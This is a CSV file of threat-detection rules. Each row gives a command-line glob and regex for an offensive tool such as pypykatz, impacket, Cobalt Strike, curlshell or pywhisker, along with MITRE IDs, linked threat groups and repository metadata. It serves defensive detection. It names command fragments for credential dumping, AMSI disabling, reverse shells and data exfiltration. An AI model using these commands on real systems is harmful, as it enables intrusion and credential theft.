"*.py  -k * -f *.bat -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.bat\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4774"
"*.py  -k * -f *.docm -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.docm\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4775"
"*.py  -k * -f *.docx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.docx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4776"
"*.py  -k * -f *.exe -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.exe\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4777"
"*.py  -k * -f *.js -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.js\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4778"
"*.py  -k * -f *.pps -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.pps\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4779"
"*.py  -k * -f *.ppsx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ppsx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4780"
"*.py  -k * -f *.ppt -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ppt\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4781"
"*.py  -k * -f *.ps1 -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ps1\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4782"
"*.py  -k * -f *.xll -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xll\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4783"
"*.py  -k * -f *.xls -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xls\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4784"
"*.py  -k * -f *.xlsb -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsb\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4785"
"*.py  -k * -f *.xlsm -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsm\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4786"
"*.py  -k * -f *.xlsx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4787"
"*.py  rekall *.dmp* -t 0",".{0,1000}\.py\s\srekall\s.{0,1000}\.dmp.{0,1000}\s\-t\s0","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","4788"
"*.py  -t *.tpe -c *.exe* -remote-lib *-remote-target *",".{0,1000}\.py\s\s\-t\s.{0,1000}\.tpe\s\-c\s.{0,1000}\.exe.{0,1000}\s\-remote\-lib\s.{0,1000}\-remote\-target\s.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","4789"
"*.py * amsi -disable*",".{0,1000}\.py\s.{0,1000}\samsi\s\-disable.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","4790"
"*.py * amsi -enable*",".{0,1000}\.py\s.{0,1000}\samsi\s\-enable.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","4791"
"*.py * --brop *",".{0,1000}\.py\s.{0,1000}\s\-\-brop\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","0","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","4792"
"*.py * --burp *",".{0,1000}\.py\s.{0,1000}\s\-\-burp\s.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","4793"
"*.py * coerce -computer *",".{0,1000}\.py\s.{0,1000}\scoerce\s\-computer\s.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","4794"
"*.py * --coerce-to *",".{0,1000}\.py\s.{0,1000}\s\-\-coerce\-to\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","4795"
"*.py * -debug -dnstcp*",".{0,1000}\.py\s.{0,1000}\s\-debug\s\-dnstcp.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","10","","N/A","","","","4796"
"*.py * --fake-server*",".{0,1000}\.py\s.{0,1000}\s\s\-\-fake\-server.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","4797"
"*.py * --just-coerce *",".{0,1000}\.py\s.{0,1000}\s\-\-just\-coerce\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","4798"
"*.py * -k -no-pass*",".{0,1000}\.py\s.{0,1000}\s\-k\s\-no\-pass.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","4799"
"*.py * --sql-shell*",".{0,1000}\.py\s.{0,1000}\s\-\-sql\-shell.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","4800"
"*.py * --teamserver *",".{0,1000}\.py\s.{0,1000}\s\-\-teamserver\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","4801"
"*.py *.cs cs ms*",".{0,1000}\.py\s.{0,1000}\.cs\scs\sms.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","4802"
"*.py *.exe *NormalDLL.dll*",".{0,1000}\.py\s.{0,1000}\.exe\s.{0,1000}NormalDLL\.dll.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/Iansus/DllProxy/","1","0","N/A","N/A","N/A","1","17","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z","4803"
"*.py *.vba *.vba  --norandomvariables --math*",".{0,1000}\.py\s.{0,1000}\.vba\s.{0,1000}\.vba\s\s\-\-norandomvariables\s\-\-math.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","4804"
"*.py *.vba *.vba  --wordlistpath * --encodestring*","\s.{0,1000}\.py\s.{0,1000}\.vba\s.{0,1000}\.vba\s\s\-\-wordlistpath\s.{0,1000}\s\-\-encodestring.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","4805"
"*.py *.vba *.vba --randomcuts 5 10 --norandomint*",".{0,1000}\.py\s.{0,1000}\.vba\s.{0,1000}\.vba\s\-\-randomcuts\s5\s10\s\-\-norandomint.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","4806"
"*.py *.vba *.vba --usebusinesswords --encodestring_calls*",".{0,1000}\.py\s.{0,1000}\.vba\s.{0,1000}\.vba\s\-\-usebusinesswords\s\-\-encodestring_calls.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","4807"
"*.py *.vba *.vba --usebusinesswords --math*",".{0,1000}\.py\s.{0,1000}\.vba\s.{0,1000}\.vba\s\-\-usebusinesswords\s\-\-math.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","4808"
"*.py *0.0.0.0*--serve-forever*",".{0,1000}\.py\s.{0,1000}0\.0\.0\.0.{0,1000}\-\-serve\-forever.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","4809"
"*.py *--dependabot-workaround*",".{0,1000}\.py\s.{0,1000}\-\-dependabot\-workaround.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","4810"
"*.py 127.0.0.1 50050 logtracker password*",".{0,1000}\.py\s127\.0\.0\.1\s50050\slogtracker\spassword.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","4812"
"*.py -action add_computer -crt * -key * -domain * -dc-ip * -computer-name * -computer-pass *",".{0,1000}\.py\s\-action\sadd_computer\s\-crt\s.{0,1000}\s\-key\s.{0,1000}\s\-domain\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-computer\-name\s.{0,1000}\s\-computer\-pass\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","4813"
"*.py -aesKey ""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab""*",".{0,1000}\.py\s\-aesKey\s\""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","4814"
"*.py -c -m c2 -p utils*",".{0,1000}\.py\s\-c\s\-m\sc2\s\-p\sutils.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","4815"
"*.py --cached --ntuser NTUSER.DAT*",".{0,1000}\.py\s\-\-cached\s\-\-ntuser\sNTUSER\.DAT.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","4816"
"*.py callobf,upx,hyperion *.exe*",".{0,1000}\.py\scallobf,upx,hyperion\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","4817"
"*.py --certificate *.pem --private-key *.pem --listen-port *",".{0,1000}\.py\s\-\-certificate\s.{0,1000}\.pem\s\-\-private\-key\s.{0,1000}\.pem\s\-\-listen\-port\s.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","4818"
"*.py --certificate fullchain.pem --private-key privkey.pem --listen-port *",".{0,1000}\.py\s\-\-certificate\sfullchain\.pem\s\-\-private\-key\sprivkey\.pem\s\-\-listen\-port\s.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","4819"
"*.py --client ftp --username * --password * --ip * --datatype ssn*",".{0,1000}\.py\s\-\-client\sftp\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-ip\s.{0,1000}\s\-\-datatype\sssn.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","4820"
"*.py --client https --data-size * --ip * --datatype cc*",".{0,1000}\.py\s\-\-client\shttps\s\-\-data\-size\s.{0,1000}\s\-\-ip\s.{0,1000}\s\-\-datatype\scc.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","4821"
"*.py -d ""test.local"" -u ""john"" -p ""password123"" --target ""user2"" --action ""list"" --dc-ip ""10.10.10.1""*",".{0,1000}\.py\s\-d\s\""test\.local\""\s\-u\s\""john\""\s\-p\s\""password123\""\s\-\-target\s\""user2\""\s\-\-action\s\""list\""\s\-\-dc\-ip\s\""10\.10\.10\.1\"".{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4822"
"*.py -d * -u * -p * --target * --action  * --export PEM*",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\s.{0,1000}\s\-\-export\sPEM.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4823"
"*.py -d * -u * -p * --target * --action ""add"" --filename * ",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""add\""\s\-\-filename\s.{0,1000}\s","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4824"
